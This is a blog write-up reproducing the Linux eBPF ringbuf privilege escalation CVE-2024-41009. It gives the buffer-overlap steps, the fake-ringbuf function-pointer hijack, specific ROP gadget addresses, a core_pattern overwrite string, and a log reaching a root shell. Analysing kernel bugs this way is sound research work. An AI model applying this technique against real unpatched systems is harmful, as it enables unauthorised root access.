Reproducing and Analyzing the Kernel Privilege Escalation CVE-2024-41009

2025/04/13 kernel-exploit

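CVE-2024-41009 is a buffer-overlap bug in the eBPF ringbuf map that can be exploited for privilege escalation. Kernel versions v5.8 through v6.9 are affected. A ringbuf sets up memory shared between the kernel and user space and follows the classic producer-consumer model: when the kernel is the producer, an eBPF program inside the kernel writes into the shared memory, and user space reads it as the consumer. The bug lives in this mode, where user space is the consumer. Inside the kernel, a BPF ringbuf map is represented by struct bpf_ringbuf, whose consumer_pos field is writable from user space. The kernel does not validate this value properly before using it, so the same region of memory can end up belonging to two different buffers at once.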

How the Vulnerability Works

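Start with the memory layout of bpf_ringbuf. consumer_pos, producer_pos, and data are all page-aligned, so the fields before bpf_ringbuf->consumer_pos occupy one page, consumer_pos occupies one page, producer_pos and pending_pos share one page, and only after that does the data area begin.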

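A 16 KB ringbuf therefore uses 7 pages in total (page 1: the fields before consumer_pos; page 2: consumer_pos; page 3: producer_pos; then 4 data pages for the 16 KB). The consumer_pos page can be mapped writable into user space with mmap (ringbuf_map_mmap_kern).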

struct bpf_ringbuf {
    wait_queue_head_t waitq;
    struct irq_work work;
    u64 mask;
    struct page **pages;
    int nr_pages;
    spinlock_t spinlock ____cacheline_aligned_in_smp;
    atomic_t busy ____cacheline_aligned_in_smp;
    unsigned long consumer_pos __aligned(PAGE_SIZE); // read-write from user space
    unsigned long producer_pos __aligned(PAGE_SIZE); // read-only from user space
    unsigned long pending_pos;
    char data[] __aligned(PAGE_SIZE);
};
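  • work - contains the function pointer func, which is invoked when a ringbuf record is released
  • consumer_pos - marks the read position and can be mapped into user space on its own. Because mmap operates on memory regions (VMAs), which are page-aligned, this field takes up a whole page even though it is only 8 bytes wide
  • data - the data area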
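To make the page accounting concrete, here is a minimal user-space sketch of the layout arithmetic described above. It is not kernel code: the names rb_layout, rb_layout_for, and MODEL_PAGE_SIZE are made up for illustration, and a 4 KB page size with three metadata pages is assumed, matching the description in this section.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096UL /* assumed page size */

/* Hypothetical summary of the layout described above (not a kernel type). */
struct rb_layout {
    size_t consumer_pos_off; /* byte offset of the consumer_pos page */
    size_t producer_pos_off; /* byte offset of the producer_pos page */
    size_t data_off;         /* byte offset of the first data page */
    size_t nr_phys_pages;    /* physical pages backing the ring buffer */
};

static struct rb_layout rb_layout_for(size_t data_size)
{
    struct rb_layout l;

    /* The data area must be a whole number of pages. */
    assert(data_size > 0 && data_size % MODEL_PAGE_SIZE == 0);

    l.consumer_pos_off = 1 * MODEL_PAGE_SIZE; /* page 0 holds waitq, work, ... */
    l.producer_pos_off = 2 * MODEL_PAGE_SIZE;
    l.data_off = 3 * MODEL_PAGE_SIZE;
    l.nr_phys_pages = 3 + data_size / MODEL_PAGE_SIZE;
    return l;
}
```

For a 16 KB data area (0x4000 bytes) this model gives 7 physical pages, with consumer_pos one page into the structure and data three pages in.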

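Buffers are allocated from the data area. Each buffer starts with an 8-byte header, struct bpf_ringbuf_hdr, which neither eBPF programs nor user space can modify directly; the allocator skips over it and returns (void *)hdr + BPF_RINGBUF_HDR_SZ.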

struct bpf_ringbuf_hdr {
    u32 len;
    u32 pg_off;
};

The data pages are mapped twice: the second half of the virtual range points at the same physical pages as the first half.

bpf_ringbuf_area_alloc
 /* Each data page is mapped twice to allow "virtual"
     * continuous read of samples wrapping around the end of ring
     * buffer area:
     * ------------------------------------------------------
     * | meta pages |  real data pages  |  same data pages  |
     * ------------------------------------------------------
     * |            | 1 2 3 4 5 6 7 8 9 | 1 2 3 4 5 6 7 8 9 |
     * ------------------------------------------------------
     * |            | TA             DA | TA             DA |
     * ------------------------------------------------------
     *                               ^^^^^^^
     *                                  |
     * Here, no need to worry about special handling of wrapped-around
     * data due to double-mapped data pages. This works both in kernel and
     * when mmap()'ed in user-space, simplifying both kernel and
     * user-space implementations significantly.
     */
    array_size = (nr_meta_pages + 2 * nr_data_pages) * sizeof(*pages);
    pages = bpf_map_area_alloc(array_size, numa_node);
    if (!pages)
        return NULL;

    for (i = 0; i < nr_pages; i++) {
        page = alloc_pages_node(numa_node, flags, 0);
        if (!page) {
            nr_pages = i;
            goto err_free_pages;
        }
        pages[i] = page;
        if (i >= nr_meta_pages)
            pages[nr_data_pages + i] = page;
    }

    rb = vmap(pages, nr_meta_pages + 2 * nr_data_pages,
          VM_MAP | VM_USERMAP, PAGE_KERNEL);
    if (rb) {
        kmemleak_not_leak(pages);
        rb->pages = pages;
        rb->nr_pages = nr_pages;
        return rb;
    }
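The effect of listing every data page twice can be modeled in user space with a plain pointer table. The sketch below mirrors the loop above but uses calloc instead of alloc_pages_node and an index lookup instead of vmap; model_fill_pages and model_data_byte are hypothetical helper names, and the caller is assumed to provide a table with nr_meta + 2 * nr_data slots.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

#define MODEL_PAGE_SIZE 4096UL /* assumed page size */

/* Fill a page table like the kernel loop: every data page is listed twice.
 * Returns 0 on success, -1 if an allocation fails. */
static int model_fill_pages(unsigned char **pages, size_t nr_meta, size_t nr_data)
{
    size_t nr_pages = nr_meta + nr_data;

    assert(pages != NULL && nr_data > 0);
    for (size_t i = 0; i < nr_pages; i++) {
        unsigned char *page = calloc(1, MODEL_PAGE_SIZE);
        if (!page) {
            while (i > 0)
                free(pages[--i]);
            return -1;
        }
        pages[i] = page;
        if (i >= nr_meta)
            pages[nr_data + i] = page; /* second mapping of the same page */
    }
    return 0;
}

/* Resolve a byte offset in the doubled data view to its backing byte. */
static unsigned char *model_data_byte(unsigned char **pages, size_t nr_meta,
                                      size_t nr_data, size_t off)
{
    assert(off < 2 * nr_data * MODEL_PAGE_SIZE);
    return &pages[nr_meta + off / MODEL_PAGE_SIZE][off % MODEL_PAGE_SIZE];
}
```

With 3 metadata pages and 4 data pages, a write at data offset 0x4000 in this model is visible at data offset 0, which is the aliasing the exploit relies on later.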

Reproducing the Exploit

In summary, the whole exploit proceeds as follows:

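  • Tamper with consumer_pos
  • Have eBPF allocate overlapping memory
  • Use the overlap to overwrite the pg_off field of a buffer hdr
  • Release the buffer, so that a fake bpf_ringbuf is derived from pg_off
  • Execute the fake func
  • Overwrite core_pattern
  • Crash on purpose to trigger a core dump that runs an arbitrary command
  • Get the flag and a root bash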

Tampering with consumer_pos from User Space

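Create a 16 KB ringbuf, map the consumer_pos page into user space, and set consumer_pos to 0x3000. Then have the eBPF program reserve two buffers of 0x3000 bytes each. Since the data area is only 0x4000 bytes, the second reservation would normally fail, but with consumer_pos already set to 0x3000 the following check is bypassed: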

__bpf_ringbuf_reserve
    if (new_prod_pos - cons_pos > rb->mask) {
        spin_unlock_irqrestore(&rb->spinlock, flags);
        return NULL;
    }
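The arithmetic behind the bypass can be checked with a small user-space model of this test. The sketch below keeps only the position bookkeeping and the comparison shown above; locking, the header write, and the other size checks in __bpf_ringbuf_reserve are left out, and model_rb and model_reserve are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_HDR_SZ 8ULL /* sizeof(struct bpf_ringbuf_hdr) */

/* Hypothetical stand-in for the three fields the check uses. */
struct model_rb {
    uint64_t mask;         /* data size - 1 */
    uint64_t consumer_pos; /* writable from user space */
    uint64_t producer_pos; /* advanced by the kernel */
};

/* Returns the data offset of the payload, or -1 if the reservation is refused. */
static int64_t model_reserve(struct model_rb *rb, uint64_t size)
{
    uint64_t len = (size + MODEL_HDR_SZ + 7) & ~7ULL; /* round_up(size + hdr, 8) */
    uint64_t prod_pos = rb->producer_pos;
    uint64_t new_prod_pos = prod_pos + len;

    /* The mask must be a power of two minus one. */
    assert((rb->mask & (rb->mask + 1)) == 0);

    /* Same comparison as the kernel snippet above. */
    if (new_prod_pos - rb->consumer_pos > rb->mask)
        return -1;

    rb->producer_pos = new_prod_pos;
    return (int64_t)((prod_pos & rb->mask) + MODEL_HDR_SZ);
}
```

With consumer_pos left at 0, the second 0x3000-byte reservation is refused because 0x6010 exceeds the mask 0x3fff. With consumer_pos forged to 0x3000, the difference is only 0x3010, so the second reservation succeeds and its payload starts at offset 0x3010.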

Allocating Overlapping Memory Chunks

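With a 16 KB buffer, nr_data_pages = 4, so [0, 0x1000] and [0x4000, 0x5000] are the same page, and offset 0x4000 points at chunk A's hdr. The two reservations yield A at [0, 0x3008] and B at [0x3008, 0x6010]. eBPF can access [0x3010, 0x6010], so writing at offset 0x4000 through B modifies A's hdr metadata. When a buffer is released, bpf_ringbuf_restore_from_rec computes the address of the ringbuf from the pg_off stored in the hdr.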

    bpf_ringbuf_discard
        bpf_ringbuf_commit
           struct bpf_ringbuf *rb = bpf_ringbuf_restore_from_rec(hdr);
                    unsigned long off = (unsigned long)hdr->pg_off << PAGE_SHIFT;
                    return (void*)((addr & PAGE_MASK) - off);
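The overlap between chunks A and B comes down to two small offset calculations, sketched here in user space. The constants are the ones quoted in this section (a 0x4000-byte data area and B's payload spanning [0x3010, 0x6010]); model_phys_off and model_index_in_b are hypothetical helper names.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_DATA_SIZE 0x4000ULL /* 16 KB data area */
#define MODEL_B_PAYLOAD 0x3010ULL /* start of chunk B's payload */
#define MODEL_B_END     0x6010ULL /* end of chunk B */

/* Map an offset in the doubled data view to the physical data offset. */
static uint64_t model_phys_off(uint64_t view_off)
{
    assert(view_off < 2 * MODEL_DATA_SIZE);
    return view_off & (MODEL_DATA_SIZE - 1);
}

/* Index into chunk B's payload that lands on a given view offset. */
static uint64_t model_index_in_b(uint64_t view_off)
{
    assert(view_off >= MODEL_B_PAYLOAD && view_off < MODEL_B_END);
    return view_off - MODEL_B_PAYLOAD;
}
```

In this model, view offset 0x4000 resolves to physical offset 0, which is A's hdr, and it is reached at index 0xff0 of B's payload. The pg_off field sits 4 bytes into the hdr, so it would be at index 0xff4.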
        

Using the Second Buffer to Overwrite the First Buffer's hdr->pg_off

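From the ringbuf layout above, the first buffer (the start of data) lies 2 pages past consumer_pos. The first buffer's hdr->pg_off can therefore be rewritten to 2, and when bpf_ringbuf_commit computes the ringbuf from the buffer's hdr, the resulting ringbuf is memory fully controlled by user space: the consumer_pos page. That page then serves as a fake bpf_ringbuf.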
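The address calculation can be replayed in user space to see why a pg_off of 2 selects the consumer_pos page. This is a sketch of the arithmetic only, assuming 4 KB pages; model_restore_from_rec is a hypothetical name, and any base address passed to it is an arbitrary example value rather than one taken from a real kernel.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_PAGE_SHIFT 12 /* assumed 4 KB pages */
#define MODEL_PAGE_MASK  (~((1ULL << MODEL_PAGE_SHIFT) - 1))

/* Same arithmetic as bpf_ringbuf_restore_from_rec, on plain integers. */
static uint64_t model_restore_from_rec(uint64_t hdr_addr, uint32_t pg_off)
{
    uint64_t off = (uint64_t)pg_off << MODEL_PAGE_SHIFT;

    /* Guard against wrapping below address zero in the model. */
    assert((hdr_addr & MODEL_PAGE_MASK) >= off);
    return (hdr_addr & MODEL_PAGE_MASK) - off;
}
```

If the ringbuf starts at some address base and the first hdr sits at base + 0x3000, the honest pg_off of 3 yields base, while the forged value 2 yields base + 0x1000, the consumer_pos page.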

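Looking at struct bpf_ringbuf again, it contains an irq_work structure named work, whose func member is a function pointer. Pointing func in the fake bpf_ringbuf at a ROP gadget is enough to execute arbitrary code.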

 struct irq_work {
    struct __call_single_node node;
    void (*func)(struct irq_work *);
    struct rcuwait irqwait;
};

Building the ROP Chain

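func sits at offset 0x28 in struct bpf_ringbuf. Since the ringbuf has been redirected to the consumer_pos page, it is enough to store the address of a stack-pivot gadget at consumer_pos+0x28; when func is called, the gadget runs and the ROP chain takes over the control flow.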

In the vmlinux I built myself, I could not find a stack-pivot gadget as convenient as the one in the original PoC: push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret

When func is called via irq_work_queue(&rb->work), both rbx and rdi hold the address of work, that is, ringbuf+0x18.

(gdb) p/x (int)&(((struct bpf_ringbuf*)0)->work)
$2 = 0x18
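The offsets used in this section can be reproduced with mock structures in user space. These are stand-ins, not the kernel definitions: the 0x18-byte size of waitq is taken from the gdb output above, the field widths in mock_call_single_node are an assumption about this build, and mock_plant is a hypothetical helper that writes two 64-bit values where the exploit needs them.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct mock_call_single_node {
    uint64_t llist_next; /* stands in for struct llist_node */
    uint32_t a_flags;    /* stands in for atomic_t a_flags */
    uint16_t src, dst;
};

struct mock_irq_work {
    struct mock_call_single_node node;
    uint64_t func;       /* stands in for the function pointer */
    uint64_t irqwait;    /* stands in for struct rcuwait */
};

struct mock_ringbuf_head {
    uint8_t waitq[0x18]; /* size assumed from the gdb output above */
    struct mock_irq_work work;
};

/* Write a return target over a_flags (+0x20) and a pivot address over func (+0x28). */
static void mock_plant(uint8_t *page, uint64_t ret_target, uint64_t pivot)
{
    assert(page != NULL);
    memcpy(page + offsetof(struct mock_ringbuf_head, work.node.a_flags),
           &ret_target, sizeof(ret_target));
    memcpy(page + offsetof(struct mock_ringbuf_head, work.func),
           &pivot, sizeof(pivot));
}
```

Under these assumptions work lands at 0x18, work.node.a_flags at 0x20, and work.func at 0x28, matching the values the article reads out of gdb.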

I could not find a stack-pivot gadget that also skips past offset +0x20 once rsp has been set; the only one I found is at 0xffffffff8225c149. After it runs, rsp points at offset 0x20.

 0xffffffff8225c149 <inet_diag_msg_common_fill+105>:  push   %rbx
   0xffffffff8225c14a <inet_diag_msg_common_fill+106>:  and    %bl,0x41(%rbx)
   0xffffffff8225c14d <inet_diag_msg_common_fill+109>:  pop    %rsp
   0xffffffff8225c14e <inet_diag_msg_common_fill+110>:  pop    %rbp
   0xffffffff8225c14f <inet_diag_msg_common_fill+111>:  ret
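The stack bookkeeping of this gadget can be traced with a tiny user-space model. It only follows rsp through push rbx, pop rsp, pop rbp, and ret over a byte buffer standing in for the fake ringbuf page; the and instruction, which modifies the byte at rbx+0x41, is not modeled. pivot_result and model_pivot are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* What the gadget leaves behind, expressed as offsets into the fake page. */
struct pivot_result {
    uint64_t rbp;      /* value popped into rbp */
    uint64_t next_rip; /* address the final ret jumps to */
    size_t rsp_off;    /* offset rsp points at after the ret */
};

static uint64_t read64(const uint8_t *p)
{
    uint64_t v;
    memcpy(&v, p, sizeof(v));
    return v;
}

static struct pivot_result model_pivot(const uint8_t *fake_rb, size_t work_off)
{
    struct pivot_result r;
    size_t rsp;

    assert(fake_rb != NULL);
    rsp = work_off;                    /* push rbx ; pop rsp => rsp = rbx = &work */
    r.rbp = read64(fake_rb + rsp);     /* pop rbp reads the qword at &work */
    rsp += 8;
    r.next_rip = read64(fake_rb + rsp); /* ret reads the qword at &work + 8 */
    rsp += 8;
    r.rsp_off = rsp;
    return r;
}
```

With work at offset 0x18, the ret in this model fetches its target from offset 0x20 and leaves rsp at 0x28. By the same accounting, a follow-up gadget of the form pop r13 ; pop r14 ; pop rbp ; ret would consume offsets 0x28, 0x30, and 0x38 and return through 0x40.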

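Putting an arbitrary gadget address at +0x20 did not work, because +0x20 is bpf_ringbuf.work.node.a_flags. With 0xffff stored there, the bug did not trigger at all: no crash and no success. With 0xff22, the kernel panicked and reported the faulting address 0xff22, which shows that a value whose low byte is 0x22 gets through. The reason is the flag check in irq_work_claim, if (oflags & IRQ_WORK_PENDING). I therefore picked a gadget whose address ends in 0x22, 0xffffffff820df722:
pop r13 ; pop r14 ; pop rbp ; ret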

(gdb) p/x (int)&(((struct bpf_ringbuf*)0)->work.node.a_flags)
$4 = 0x20
0x22 == CSD_TYPE_IRQ_WORK(0x20) | IRQ_WORK_BUSY (0x02);
IRQ_WORK_PENDING = 0x1

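Next, the ROP chain overwrites core_pattern with |/proc/%P/fd/666 %P, which points at a memfd, and the exploit copies its own binary into that memfd. The exploit then crashes on purpose to trigger a core dump, the kernel runs the exploit binary itself as root, and the privilege escalation is complete.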
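As a small illustration of the string involved, the sketch below builds the core_pattern value for a given file descriptor number. It only formats text and does not touch /proc or create a memfd; format_core_pattern and core_pattern_is_pipe are hypothetical helpers, and 666 is simply the descriptor number quoted above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Build "|/proc/%P/fd/<fd> %P". Returns the length, or -1 if buf is too small. */
static int format_core_pattern(char *buf, size_t len, int fd)
{
    int n;

    assert(buf != NULL && len > 0 && fd >= 0);
    /* %% emits a literal '%', so the kernel later sees the %P specifier. */
    n = snprintf(buf, len, "|/proc/%%P/fd/%d %%P", fd);
    return (n >= 0 && (size_t)n < len) ? n : -1;
}

/* A leading '|' tells the kernel to pipe the core dump to a program. */
static bool core_pattern_is_pipe(const char *pattern)
{
    assert(pattern != NULL);
    return strncmp(pattern, "|", 1) == 0;
}
```

The %P specifier expands to the PID of the crashing process in the initial PID namespace, so the path resolves to descriptor 666 of the crashing exploit process, and the same PID is passed to the program as its argument.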

Reproduction:

Every gadget must lie within [_stext, _etext]; otherwise the kernel raises an NX fault:

[   81.766165] kernel tried to execute NX-protected page - exploit attempt? (uid: 1000)
[   81.792896] BUG: unable to handle page fault for address: ffffffff8299a052
[   81.810767] #PF: supervisor instruction fetch in kernel mode
[   81.823853] #PF: error_code(0x0011) - permissions violation
[   81.836248] PGD 3c46067 P4D 3c46067 PUD 3c47063 PMD 80000000028001e1
[   81.851043] Oops: 0011 [#1] PREEMPT SMP PTI

test:

$ ./poc
Hello World!
try to wait core
[   95.464768] BUG: scheduling while atomic: poc/354/0x00010002
[   95.478632] Modules linked in:

sockets[0]: 5, socket[1]: 6
[   95.486469] Preemption disabled at:
[   95.486474] [<ffffffff81310e23>] irq_work_queue+0x23/0x50
[   95.508029] CPU: 1 PID: 354 Comm: poc Not tainted 6.3.0 #93
[   95.526632] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   95.599172] Call Trace:
[   95.677927] ------------[ cut here ]------------
[   95.683175] Voluntary context switch within RCU read-side critical section!
[   95.683816] WARNING: CPU: 1 PID: 354 at kernel/rcu/tree_plugin.h:318 rcu_note_context_switch+0x62c/0x690
[   95.713178] Modules linked in:
[   95.718262] CPU: 1 PID: 354 Comm: poc Tainted: G        W          6.3.0 #93
[   95.735521] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   95.752900] RIP: 0010:rcu_note_context_switch+0x62c/0x690
[   95.762138] Code: 00 00 00 00 0f 85 0d fd ff ff 49 89 8c 24 a0 00 00 00 e9 00 fd ff ff 48 c7 c7 a8 24 27 83 c6 05 75 08 ce 02 01 e8 a4 82 f6 ff <0f> 0b e9 3b fa ff ff 49 83 bc 24 98 00 00 00 00 49 8b 84 24 a0 00
[   95.793147] RSP: 0018:ffffc900009adf40 EFLAGS: 00010086
[   95.801582] RAX: 0000000000000000 RBX: ffff88813bcb3700 RCX: 0000000000000000
[   95.814821] RDX: 0000000000000003 RSI: 0000000000000027 RDI: 00000000ffffffff
[   95.828898] RBP: 0000000000000000 R08: 00000000ffffdfff R09: 0000000000000001
[   95.840645] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88813bcb2880
[   95.854500] R13: ffff888102acb240 R14: 0000000000000000 R15: 0000000000000000
[   95.871507] FS:  0000000000da2380(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[   95.890278] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   95.901485] CR2: 00000000004b9000 CR3: 0000000102a02000 CR4: 0000000000050ee0
[   95.918447] Call Trace:
[   95.925747] ---[ end trace 0000000000000000 ]---
[   96.027876] poc[355]: segfault at 0 ip 000000000040248d sp 00007ffc781827d0 error 6 in poc[401000+89000] likely on CPU 1 (core 1, socket 0)
[   96.075993] Code: df e8 97 fb 01 00 ba 10 00 00 00 4c 89 ee 48 89 ef e8 47 ec ff ff 85 c0 0f 85 4f ff ff ff 48 8d 3d d6 7b 08 00 e8 03 46 00 00 <48> c7 04 25 00 00 00 00 00 00 00 00 0f 0b 0f 1f 44 00 00 f3 0f 1e
check core: /proc/sys/kernel/core_pattern
Root shell !!
FLAG{test-by-hxqu}
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@wintermute:/#
root@wintermute:/# whoami
root

Environment

Kernel version used:
6.3 commit 457391b0380335d5e9a5babdec90ac53928b23b4
Steps: buf-overlapping -> buf metadata -> ringbuf meta -> function pointer -> stack pivot -> ROP

All reproduction files: link

References

2024-41009-poc
